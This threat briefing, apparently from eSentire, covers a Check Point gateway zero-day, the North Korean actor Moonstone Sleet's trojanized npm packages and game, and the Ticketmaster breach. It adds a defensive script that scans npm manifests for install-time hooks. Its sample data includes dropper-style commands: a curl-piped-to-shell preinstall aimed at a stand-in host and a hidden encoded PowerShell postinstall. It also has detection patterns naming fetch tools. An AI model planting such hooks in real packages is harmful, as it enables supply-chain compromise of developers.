Weekly Threat Briefing: May 27 - 31, 2024
Every week, eSentire’s Threat Response Unit (TRU) compiles the following threat intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Check Point Zero-Day Targeted in Ongoing Attacks
On May 28th, Check Point confirmed the existence of an actively exploited zero-day vulnerability impacting Check Point Security Gateways. The vulnerability, tracked as CVE-2024-24919 (CVSS: 7.5), is an information disclosure vulnerability that impacts all Check Point Security Gateways with either the IPsec VPN or the Mobile Access Software Blade enabled.
Exploitation allows an unauthenticated remote threat actor to read certain information on the gateway, including the password hashes of all local accounts. Gateways used only for site-to-site IPsec VPN are not affected.
Check Point has confirmed attacks against a “small number of customers” and notes that the exploitation it has observed targeted organizations that still allow remote access with local accounts protected by password-only authentication. Threat actors are believed to be exploiting the vulnerability to harvest these hashes and other information that would enable remote access into victim environments. Because the leaked data includes credential material, applying the hotfix alone does not close the exposure: passwords for local accounts on affected gateways should be reset, and authentication logs should be reviewed for logins using those accounts from unexpected sources.
On May 29th, eSentire’s Threat Response Unit (TRU) performed threat hunts based on known Indicators of Compromise (IoCs) and published a security advisory warning of active exploitation and urging organizations to apply the available patches. eSentire Managed Vulnerability Service has plugins in place to identify vulnerable versions of Check Point Security Gateways.
Moonstone Sleet Emerges as New North Korean Threat Actor with New Bag of Tricks
On May 28th, Microsoft’s Threat Intelligence team released a report on a new North Korean threat actor tracked as Moonstone Sleet (formerly Storm-1789). This actor has been observed employing a diverse range of tactics and techniques to achieve its objectives, which primarily revolve around espionage and revenue generation.
By presenting themselves as legitimate business entities, these actors successfully distribute trojanized software to unsuspecting users. This software is carefully designed to appear harmless, thus bypassing initial scrutiny and infecting devices with malware.
A notable tactic used by Moonstone Sleet involves targeting software developers through malicious npm packages. Once a developer installs or integrates one of these packages into a legitimate project, the package's code runs in the developer's environment, giving the threat actors a foothold on the developer's machine and a conduit for injecting malicious code into the software that developer builds.
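The npm vector above works because npm runs the lifecycle scripts declared in a dependency's package.json (preinstall, install, postinstall) at install time, before any of the package's modules are ever imported, so a trojanized dependency can act as a dropper the moment it is pulled into a project. The following is an added example, not code from Microsoft's report or from eSentire: it audits a set of package manifests for install-time hooks and flags commands that look like droppers. The manifests, package names and the indicator patterns are constructed for this example and are not indicators from the Moonstone Sleet campaign.

```javascript
"use strict";

// Added example: audit npm manifests for install-time lifecycle hooks.
// npm runs preinstall/install/postinstall for every dependency it installs
// from the registry; prepare runs for the root project and for dependencies
// installed from git. All of them execute with the installing user's privileges.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators of dropper-like behaviour in a hook command.
// These patterns are this example's own, not a published rule set.
const INDICATORS = [
  { name: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b/i },
  { name: "inline-eval", re: /\bnode\s+(-e|--eval|-p)\b/ },
  { name: "shell-wrapper", re: /\b(powershell|pwsh|cmd(\.exe)?|bash|sh)\b/i },
  { name: "encoded-payload", re: /\b(base64|atob)\b|\s-e(nc|ncodedcommand)\b/i },
  { name: "child-process", re: /\b(child_process|execSync|spawnSync|spawn)\b/ },
  { name: "credential-paths", re: /(process\.env|\$HOME|%USERPROFILE%|\.npmrc|\.ssh\/|\.aws\/)/ },
];

// Scan entries of the form { path, manifest } and return one finding per
// install hook found. Severity is "high" when any indicator matches and
// "info" otherwise, so a reviewer still sees which dependencies run code
// at install time even when the command looks benign.
function scanManifests(entries) {
  const findings = [];
  for (const { path, manifest } of entries) {
    const scripts =
      manifest && typeof manifest.scripts === "object" && manifest.scripts !== null
        ? manifest.scripts
        : {};
    for (const hook of INSTALL_HOOKS) {
      const command = scripts[hook];
      if (typeof command !== "string" || command.trim() === "") continue;
      const indicators = INDICATORS.filter(({ re }) => re.test(command)).map(({ name }) => name);
      findings.push({
        path,
        name: manifest.name || "(unnamed)",
        hook,
        command,
        indicators,
        severity: indicators.length > 0 ? "high" : "info",
      });
    }
  }
  return findings;
}

function highSeverity(findings) {
  return findings.filter((f) => f.severity === "high");
}

// Constructed manifests standing in for node_modules/*/package.json files.
// The package names and commands are invented for this example.
const SAMPLE_MANIFESTS = [
  { path: "node_modules/left-pad/package.json",
    manifest: { name: "left-pad", version: "1.3.0" } },
  { path: "node_modules/native-helper/package.json",
    manifest: { name: "native-helper", scripts: { install: "node scripts/build.js", test: "mocha" } } },
  { path: "node_modules/totally-legit-utils/package.json",
    manifest: { name: "totally-legit-utils",
      scripts: { preinstall: "node -e \"require('child_process').execSync('curl -fsSL https://example.invalid/x.sh | sh')\"" } } },
  { path: "node_modules/win-telemetry/package.json",
    manifest: { name: "win-telemetry",
      scripts: { postinstall: "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA" } } },
];

// Run stand-alone: print findings and exit non-zero if anything is high severity.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  const findings = scanManifests(SAMPLE_MANIFESTS);
  for (const f of findings) {
    const tail = f.indicators.length ? `  <- ${f.indicators.join(", ")}` : "";
    console.log(`[${f.severity}] ${f.name} ${f.hook}: ${f.command}${tail}`);
  }
  process.exitCode = highSeverity(findings).length > 0 ? 1 : 0;
}
```

In a real pipeline the entries would be built by reading every package.json under node_modules after `npm ci`. The heuristics will produce noise (native modules legitimately run `node scripts/build.js` on install), which is why hook presence is reported as info rather than suppressed: the review question is whether a given dependency has a reason to run code at install time at all. The cheapest preventive control is to install with scripts disabled (`npm ci --ignore-scripts`, or `npm config set ignore-scripts true` on build hosts) and re-enable them only for the specific dependencies that need them.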
One of the more innovative methods utilized by Moonstone Sleet is the development of a malicious game. Moonstone Sleet created a robust public campaign that includes websites and many X (formerly Twitter) accounts to bolster the game’s legitimacy. Malicious DLLs are loaded when the game is launched, resulting in the execution of a custom malware loader tracked as YouieLoad.
In addition to these tactics, Moonstone Sleet has developed and deployed custom ransomware tracked as FakePenny. This ransomware encrypts files on infected systems, demanding a ransom for their decryption. In an incident observed by Microsoft, the ransom demand was $6.6M USD in BTC.
To mitigate the risks posed by actors like Moonstone Sleet, organizations should adopt a multi-layered defense strategy. This includes regular security assessments, employee training on recognizing social engineering tactics, and the implementation of robust incident response plans. Additionally, credential hardening and access control measures are critical in protecting against unauthorized access and data breaches.
Ticketmaster Breach
On May 28th, a cybercriminal group posted an alleged database for sale online, claiming it contained the information of 560 million LiveNation/Ticketmaster users.
According to vx-underground, who spoke with “multiple individuals privy to and involved in the alleged Ticketmaster breach", the breach occurred sometime in April, when an unidentified threat group gained access to Ticketmaster's Amazon Web Services (AWS) instances by pivoting from a Managed Service Provider (MSP).
They claim that the Shiny Hunters group is not responsible for the breach itself but is acting as a proxy for the threat group that carried out the compromise.
This alleged data leak highlights the importance of layered security for companies holding large amounts of customer data, as they are highly valued targets for attackers. The eSentire Threat Response Unit (TRU) assesses that this data set is likely legitimate and will impact a significant number of Ticketmaster users.
The reported MSP pivot is the detail defenders should take from this incident. Organizations typically rely on multiple third-party services and providers, and each of those relationships is an access path into the environment. Provider access should be held to the same standard as internal access: scoped to the minimum permissions needed, protected by multi-factor authentication, and logged so that anomalous activity from a provider's accounts can be detected before it becomes a bulk data theft.
About the eSentire Threat Response Unit (TRU)
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.